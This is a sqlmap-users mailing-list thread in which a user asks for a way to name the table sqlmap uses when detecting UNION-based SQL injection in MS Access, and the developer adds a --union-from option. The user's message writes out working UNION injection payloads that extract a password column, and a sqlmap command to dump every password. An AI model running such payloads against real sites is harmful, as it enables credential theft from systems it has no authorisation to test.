Re: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln
|
From: Miroslav S. <mir...@gm...> - 2013-03-21 10:32:38
|
Hi Buawig. Implemented as requested [1]. Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/423 On Tue, Mar 19, 2013 at 8:34 PM, buawig <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > I've got a simple union based sqli (resulting webpage shows only one > entry/row). > > Valid statements that show the numbers in the resulting html page: > > ...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar > ...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar > > - - foobar is an existing table (gathered via error messages in html) > - - password is a valid column in the foobar table > > The following URL gives you one password: > > ...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 > from foobar > > > Now I wanted to hand over to sqlmap to dump all passwords: > > sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password > - --dump > > which did not work out (0 entries retrieved), but it was confirmed > that the table has several hundred entries. > > - - sqlmap was able to detect the number of columns is 13 (correct) > - - sqlmap confirmed a bolean-based blind sqli vulnerability (but no > UNION based sqli) > - - sqlmap was able to confirm the existence of table name (with --tables) > (echo foobar > txt/common-tables.txt) > - - sqlmap was able to confirm the existence of column name password > (with --colums) > > When running something like: > - --technique=U --union-cols=13 --union-char=1 > > sqlmap requested something *like*: > > ...id=-123 union all select > 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from > MSysAccessObjects%00 > > which results in the following error message (shown in the html page): > > The Microsoft Jet database engine cannot find the input table or query > 'MSysAccessObjects'. Make sure it exists and that its name is spelled > correctly. > > So if sqlmap would accept a known tablename on the command line that > it would use to detect/confirm the union based sqli vuln, instead of > using "MSysAccessObjects" this would make sqlmap more useful > (or simply use the table name specified in -T or previously > bruteforced to detect union-based sqli). > > thanks! > > PS: I did *not* run sqlmap with special --risk/--level because I don't > want to send several unneeded http requests if the vulnerability is > already confirmed (manually). I'm using sqlmap mainly for exploitation > (not so much for detection) and would appreciate if the user could > tell sqlmap how to exploit a certain sqli (something that is already > partially given with --technique, --union-cols, --union-chars). > > I did use 1.0-dev-d1ae62b. > > ref: > http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html > > http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRSL3LAAoJEJeRHQyF0ukMFLsP/3OdDtcE5K+6AttmQhmadyum > 0/yDLbtTS06W6iW1iguuvPL/Kva6gURynOrwEh/eD+AOPVVBUD6vjjHx9Z8R4XLO > 8OrOWqQ6xe7ppjsU3ThXy550vFD/n62DgNjsM/JkwTFicSki4+JYwbmE9CPjfSfk > mRmLadOP4/iU7m+s3bv6f58jTUO6YdPOqR3yEWuES5k+sL+7QDDPPk8fEqbvKuxw > JK2yYsa5ZmP78GW9s7Gg1BjnMI51G3NbNI0ZdZllFm2APwSw9R+13YzXwtp0V6oJ > L+SDZJ0ZIJLEw133F/eoASVTQMZICz/K494KmXWlv68ac9TLmrvRGcis7o6FdGE1 > lUa5LC7ddNE7Z21g83miC4CaG4JUqXxQ2kdW1HW7joLGHl+Gi45gr0A+t6QmRVOl > njOM/2O3wBDfaif68Equ9+Bm1JK5DzVEwu0mMBUrKNEfynR1PvU6/T7R/f1Ogu8p > 8H32HtwGQLowwNYbHz3SMk0ecY9lVOAhIAA6afz0YTuyh777cVJCq7YmgTXBUlpQ > zqEO72FGTyObOnbYhGE8dN6TdfsCk0Fdl5VJC3TTHoLRtRuQC7WzxZktwETl6Jxy > dOjG2MpjMdtu3zR07WzuroRdrgFhnonb1Wq7BWDDKgB6kFrH80GMYt0hpNJ9mY0c > 0p/jGfV1aHnEBhy3KpXe > =Q1R5 > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_mar > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
